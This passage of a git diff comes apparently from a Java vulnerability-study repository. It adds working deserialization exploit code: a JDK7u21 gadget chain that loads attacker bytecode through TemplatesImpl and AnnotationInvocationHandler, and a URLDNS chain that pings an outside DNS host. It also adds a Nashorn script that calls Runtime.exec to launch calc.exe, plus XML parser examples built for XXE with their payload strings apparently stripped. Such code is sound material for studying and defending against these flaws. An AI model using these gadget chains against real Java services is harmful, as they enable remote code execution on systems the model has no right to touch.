Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..a7824f5 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -0,0 +1,68 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.HashSet; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + // 实例化AnnotationInvocationHandler类 + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); + + // 为tempHandler创造一层代理 + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + // 实例化HashSet,并将两个对象放进去 + HashSet set = new LinkedHashSet(); + set.add(templates); + set.add(proxy); + + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java similarity index 69% rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java new file mode 100644 index 0000000..296614c --- /dev/null +++ b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java @@ -0,0 +1,52 @@ +package com.govuln.deserialization; + +import java.io.*; +import java.lang.reflect.Field; +import java.net.InetAddress; +import java.net.URL; +import java.net.URLConnection; +import java.net.URLStreamHandler; +import java.util.HashMap; + +public class URLDNS { + + static class SilentURLStreamHandler extends URLStreamHandler { + + protected URLConnection openConnection(URL u) throws IOException { + return null; + } + + protected synchronized InetAddress getHostAddress(URL u) { + return null; + } + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String []args) throws Exception { + String url = "http://dns.675ba661.y7z.xyz"; + + //Avoid DNS resolution during payload creation + //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload. + URLStreamHandler handler = new SilentURLStreamHandler(); + + HashMap ht = new HashMap(); // HashMap that will contain the URL + URL u = new URL(null, url, handler); // URL to use as the Key + ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. + + setFieldValue(u, "hashCode", -1); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(ht); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} diff --git a/jdk8/src/main/java/com/govuln/js/Eval.java b/jdk8/src/main/java/com/govuln/js/Eval.java new file mode 100644 index 0000000..6c11506 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/js/Eval.java @@ -0,0 +1,20 @@ +package com.govuln.js; + +import javax.script.ScriptEngine; +import javax.script.ScriptEngineManager; +import java.io.FileReader; + +import jdk.nashorn.api.scripting.NashornException; +import jdk.nashorn.api.scripting.NashornScriptEngine; +import jdk.nashorn.api.scripting.NashornScriptEngineFactory; + +import java.io.InputStream; +import java.lang.Exception; + +public class Eval { + public static void main(String[] args) throws Exception { + ScriptEngineManager manager = new ScriptEngineManager(); + ScriptEngine engine = manager.getEngineByName("JavaScript"); + engine.eval(new FileReader("src/main/resources/eval.js")); + } +} diff --git a/jdk8/src/main/java/com/govuln/serialization/Converter.java b/jdk8/src/main/java/com/govuln/serialization/Converter.java new file mode 100644 index 0000000..d3b6ed4 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/serialization/Converter.java @@ -0,0 +1,39 @@ +package com.govuln.serialization; + +import java.io.ByteArrayOutputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.ObjectOutputStream; + +public class Converter { + public static byte[] toBytes(Object[] objs) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + DataOutputStream dos = new DataOutputStream(baos); + for (Object obj : objs) { + treatObject(dos, obj); + } + dos.close(); + return baos.toByteArray(); + } + + public static void treatObject(DataOutputStream dos, Object obj) + throws IOException { + if (obj instanceof Byte) { + dos.writeByte((Byte) obj); + } else if (obj instanceof Short) { + dos.writeShort((Short) obj); + } else if (obj instanceof Integer) { + dos.writeInt((Integer) obj); + } else if (obj instanceof Long) { + dos.writeLong((Long) obj); + } else if (obj instanceof String) { + dos.writeUTF((String) obj); + } else { + ByteArrayOutputStream ba = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(ba); + oos.writeObject(obj); + oos.close(); + dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header + } + } +} diff --git a/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java new file mode 100644 index 0000000..d20a7af --- /dev/null +++ b/jdk8/src/main/java/com/govuln/serialization/UserSerialization.java @@ -0,0 +1,24 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Base64; + +import java.io.*; + +public class UserSerialization { + public static void main(String[] args) throws Exception + { + write(); + } + + public static void write() throws Exception + { + User user = new User("Bob"); + user.setParent(new User("Josua")); + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(user); + + System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); + } +} diff --git a/jdk8/src/main/java/com/govuln/serialization/model/User.java b/jdk8/src/main/java/com/govuln/serialization/model/User.java new file mode 100644 index 0000000..bda5098 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/serialization/model/User.java @@ -0,0 +1,18 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class User implements Serializable { + protected String name; + protected User parent; + + public User(String name) + { + this.name = name; + } + + public void setParent(User parent) + { + this.parent = parent; + } +} diff --git a/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java new file mode 100644 index 0000000..3111c38 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java @@ -0,0 +1,18 @@ +package com.govuln.xxe; + +import org.w3c.dom.Document; +import javax.xml.parsers.DocumentBuilder; +import javax.xml.parsers.DocumentBuilderFactory; +import java.io.ByteArrayInputStream; + +public class DocumentBuilderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); + Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); + System.out.println(doc.getDocumentElement().getTextContent()); + } +} diff --git a/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java new file mode 100644 index 0000000..46fa054 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java @@ -0,0 +1,23 @@ +package com.govuln.xxe; + +import org.xml.sax.helpers.DefaultHandler; + +import javax.xml.parsers.SAXParser; +import javax.xml.parsers.SAXParserFactory; +import java.io.ByteArrayInputStream; + +public class SAXParserExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); + + parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + } +} diff --git a/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java new file mode 100644 index 0000000..459a222 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +public class XMLReaderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XMLReader reader = XMLReaderFactory.createXMLReader(); + reader.setContentHandler(new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + reader.parse(new InputSource(data)); + } +} diff --git a/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java new file mode 100644 index 0000000..0173a44 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java @@ -0,0 +1,28 @@ +package com.govuln.xxe; + +import javax.xml.stream.XMLInputFactory; +import javax.xml.stream.XMLStreamReader; +import java.io.*; + +public class XMLStreamExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + InputStream input = new ByteArrayInputStream(data.getBytes()); + XMLInputFactory factory = XMLInputFactory.newFactory(); + XMLStreamReader reader = factory.createXMLStreamReader(input); + + while (reader.hasNext()) { + reader.next(); + if (reader.isStartElement()) { + System.out.println("Start: " + reader.getLocalName()); + } else if (reader.isEndElement()) { + System.out.println("End: " + reader.getLocalName()); + } else if (reader.hasText()) { + System.out.println("Data: " + reader.getText().trim()); + } + } + } +} diff --git a/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java new file mode 100644 index 0000000..9b15047 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import javax.xml.xpath.XPath; +import javax.xml.xpath.XPathExpression; +import javax.xml.xpath.XPathFactory; +import java.io.ByteArrayInputStream; + +public class XPathExpressionExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XPathFactory xPathFactory = XPathFactory.newInstance(); + XPath xpath = xPathFactory.newXPath(); + XPathExpression xPathExpr = xpath.compile("/foo/text()"); + + String result = xPathExpr.evaluate(new InputSource(data)); + System.out.println(result); + } +} diff --git a/general/src/main/java/evil/EvilTemplatesImpl.java b/jdk8/src/main/java/evil/EvilTemplatesImpl.java similarity index 100% rename from general/src/main/java/evil/EvilTemplatesImpl.java rename to jdk8/src/main/java/evil/EvilTemplatesImpl.java diff --git a/general/src/main/java/evil/Hello.java b/jdk8/src/main/java/evil/Hello.java similarity index 100% rename from general/src/main/java/evil/Hello.java rename to jdk8/src/main/java/evil/Hello.java diff --git a/jdk8/src/main/resources/eval.js b/jdk8/src/main/resources/eval.js new file mode 100644 index 0000000..f80f6b6 --- /dev/null +++ b/jdk8/src/main/resources/eval.js @@ -0,0 +1,4 @@ +var a = new java.beans.Customizer { + setObject: eval +} +a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51"; \ No newline at end of file